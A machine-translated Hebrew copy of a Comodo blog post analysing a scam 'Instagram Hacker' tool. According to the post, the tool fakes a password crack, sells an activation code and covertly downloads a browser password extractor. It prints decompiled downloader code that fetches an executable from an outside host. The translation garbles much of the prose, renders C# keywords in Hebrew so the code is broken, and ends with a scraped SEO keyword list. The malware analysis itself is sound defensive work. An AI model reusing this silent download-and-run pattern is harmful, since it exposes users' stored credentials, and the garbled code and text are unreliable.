זמן קריאה: 4 דקות
אנשים רבים אינם רואים יישומים פוטנציאליים לא רצויים (PUA) כסכנה חמורה. הסיבה ליחס פזיז כזה היא שלרוב מותקנים PUA בהסכמת המשתמש. אבל דעה זו היא טעות גדולה. ולא רק מכיוון ש- PUA יכול להתקין בסתר תוכנות אחרות כמו תוכנות פרסום או תוכנות ריגול על בסיס הורדה בכונן. הדוגמא החיה להלן נותח על ידי מעבדות המחקר על איומי קומודו מומחים מדגימים בבירור ש- PUA יכול להיות כלי נשק מאיים בהרבה.
הכירו את התוכנה בשם "Instagram Hacker". יש לו את האתר הרשמי https://hackinstagram.net/ ומבטיחה ... לפרוץ כל חשבון אינסטגרם. יותר מזה, תוכלו להוריד ולהתקין אותו בחינם.
לאחר ההתקנה הוא מתבקש להזין כתובת אתר לפרופיל אינסטגרם ולפרוץ את הסיסמה.
התוצאה מגיעה תוך מספר שניות:
אך לאחר לחיצה על כפתור "הצג סיסמא", מופיע חלון חדש:
לחיצה על כפתור "קבל קוד הפעלה" מפנה מחדש אל "דף קנייה".
הוא מציע לקנות "קוד הפעלה" אבל ... האם אתה יכול להריח הונאה באוויר? זה ברור, שום תוכנה שלא מצליחה לשבור סיסמת אינסטגרם לשניות יכולה להתקיים. אז האם האקר של אינסטגרם הוא רק עוד כלי שולל בכדי להרפות את הפלטונים? הדרך הטובה ביותר לבדוק זאת היא להסתכל בתוך קוד היישום.
הקוד מוגן באמצעות Dotnet Reactor אך ניתן לפענח אותו באמצעות הכלי de4dot.
ועכשיו אנו יכולים לראות בוודאות שהאפליקציה היא כלי הונאה. קטע הקוד הראשון מזויף את מחוון הדגמת ההתקדמות.
אבל עוד אחד מעניין יותר. כפי שאתה יכול לראות, היא מכילה כתובת URL עם הפעלה להורדה אם ההפעלה הייתה מוצלחת.
טוען חלון חלון ()
{
Class2.qDiUy7EzyuIMj ();
this.filename = "view.exe";
this.uri = אורי חדש ("http://software-logistics.net/external/component/download/view.exe");
זה.אתחול רכיב ();
אם (File.Exists (this.filename))
{
File.Delete (this.filename);
}
לנסות
{
WebClient client1 = WebClient חדש ();
client1.DownloadFileAsync (this.uri, this.filename);
client1.DownloadProgressChanged + = הורד חדשProgressChangedEventHandler (this.method_1);
client1.DownloadFileCompleted + = חדש AsyncCompletedEventHandler (this.method_2);
}
לתפוס
{
this.method_0 ();
}
}
}
}
אם נפעיל את ההפעלה, נגלה שמדובר ביישום WebBrowserPassView של NirSoft:
https://www.nirsoft.net/utils/web_browser_password.html
WebBrowserPassView הוא רק כלי לחילוץ סיסמאות החושף את הסיסמאות המאוחסנות על ידי דפדפני האינטרנט. אז כל הסיסמאות שתוכנה זו יכולה לחלץ אינן אינסטגרם אלא סיסמאות המשתמשים שלהן שמורות בדפדפנים שלהן!
בוא נתחדש: כל מה שהאינסטגרם האקר עושה זה להוריד ולהשיק עוד PUA מבית NirSoft. אז ברור שאנחנו עומדים בפני כלי הונאה. שימו לב לטריק הפסיכולוגי המניפולטיבי כאן: אם קורבן מגלה שנרמה אותה, היא כמעט ולא מדווחת על המשטרה על האירוע. מכיוון שבמקרה כזה, היא תצטרך להתוודות בניסיון לפרוץ את אינסטגרם, זהו מעשה של ביצוע פשע ברשת.
אבל זה קצה דק של הקצה.
האיום המסוכן ביותר הוא שניתן לשנות את כתובת האתר ביישום בקלות על כל אחד אחר באמצעות קובץ זדוני שיוצא להורג במחשב של הקורבן. אז PUA זה - כמו גם דוגמאות רבות אחרות מסוג זה - יכול לשמש להפצה מסיבית של תוכנות זדוניות "כבדות" שונות כמו סוסים טרויאנים, דלתות אחוריות, ransomware וכו '
וזו סיבה טובה לקחת את PUA כתוכנה זדונית ממש מסוכנת. מכיוון שזה יתברר כמקפצה להתקפת סייבר מאסיבית הרסנית.
"לא כדאי לנו לשקול תוכנות זדוניות כמסוכנת או לא כל כך מסוכנת ", אומר פטיה אורחאן, ראש מעבדות המחקר של קומודו. "כל תוכנות זדוניות לא קיים במרחב מבודד. בימינו פושעי סייבר בונים רשתות זדוניות ארוכות כדי לתקוף משתמשים, וכפי שאתה יכול לראות, PUA יכול להיות חוליה בשרשרת הרג כזו. לכן עלינו לקרוא לילד בשמו. כן, יישומים אלה מורידים ומופעלים באישור המשתמשים אך כמו במקרה זה האישור מסחט בהונאה. בכל אפליקציות בעלות פוטנציאל לא רצוי שמתיימר להיות לגיטימי, כולם צריכים להבין שזה רק הסוואה. זו הסיבה שקומודו מספקת לא רק הגנה טכנית מתקדמת אלא מודיעה באופן קבוע למשתמשים למנוע מהם מלכודות מסוכנות במרחב הסייבר ”.
חיה מאובטחת עם קומודו!
משאבים קשורים
התקפת DDOS של ויקיפדיה
הסרת תוכנות זדוניות
סורק תוכנות זדוניות באתר
אבטחת האתר הטובה ביותר
אבטחה ב- WordPress
להתחיל ניסיון ללא תשלום קבלו את כרטיס האבטחה המיידי בחינם
- הפצת תוכן ויחסי ציבור מופעל על ידי SEO. קבל הגברה היום.
- Platoblockchain. Web3 Metaverse Intelligence. ידע מוגבר. גישה כאן.
- מקור: https://blog.comodo.com/comodo-news/how-unwanted-applications-are-greater-security-threat/
- a
- יכול
- אודות
- חֶשְׁבּוֹן
- לפעול
- הפעלה
- לאחר
- AIR
- תעשיות
- ו
- אחר
- בקשה
- יישומים
- הסכמה
- לתקוף
- גישה
- דלתות אחוריות
- בסיס
- כי
- הטוב ביותר
- גָדוֹל
- בלוג
- לשבור
- דפדפנים
- לִבנוֹת
- לַחְצָן
- לִקְנוֹת
- שיחה
- מקרה
- שרשרת
- שרשראות
- לבדוק
- בבירור
- קוד
- מתחייב
- הסכמה
- לשקול
- מכיל
- התקפת סייבר
- פשעי אינטרנט
- עברייני אינטרנט
- סכנה
- מסוכן
- DDoS
- הרסנית
- מגלה
- לא
- לְהַכפִּיל
- להורדה
- בקלות
- אדג '
- זן
- וכו '
- אירוע
- דוגמה
- דוגמאות
- מומחים
- תמצית
- פָּנִים
- מעטים
- שלח
- ראשון
- הונאה
- חופשי
- החל מ-
- לקבל
- טוב
- יותר
- לפרוץ
- האקר
- ראש
- כאן
- איך
- איך
- HTML
- HTTPS
- in
- תקרית
- אינדיקטור
- אינסטגרם
- להתקין
- מיידי
- מעניין
- מְבוּדָד
- IT
- מעבדות
- השקה
- קשר
- ארוך
- נראה
- מכונה
- תוכנות זדוניות
- התקפת תוכנות זדוניות
- רב
- מסיבי
- max-width
- טעות
- יותר
- רוב
- שם
- צרכי
- חדש
- ברור
- המיוחדות שלנו
- רשמי
- אתר רשמי
- ONE
- דעה
- אחר
- שֶׁלוֹ
- סיסמה
- סיסמאות
- אֲנָשִׁים
- PHP
- אפלטון
- מודיעין אפלטון
- אפלטון נתונים
- מִשׁטָרָה
- פוטנציאל
- למנוע
- פּרוֹפִיל
- תוכניות
- התקדמות
- מבטיח
- מוּגָן
- .
- לספק
- להבין
- טעם
- פזיז
- באופן קבוע
- דוחות לדוגמא
- מחקר
- תוצאה
- קורות חיים
- מגלה
- להיפטר
- הפעלה
- כרטיס ניקוד
- שניות
- לבטח
- אבטחה
- רציני
- צריך
- So
- תוכנה
- מֶרחָב
- תוכנות ריגול
- מאוחסן
- מוצלח
- כזה
- לקחת
- טכני
- אל האני
- שֶׁלָהֶם
- איום
- בכל
- זמן
- ל
- כלי
- מלכודות
- תור
- להבין
- לא רצוי
- כתובת האתר
- משתמש
- משתמשים
- בְּדֶרֶך כְּלַל
- שונים
- קרבן
- לצפיה
- אינטרנט
- דפדפני אינטרנט
- אתר
- יצטרך
- היה
- אתה
- זפירנט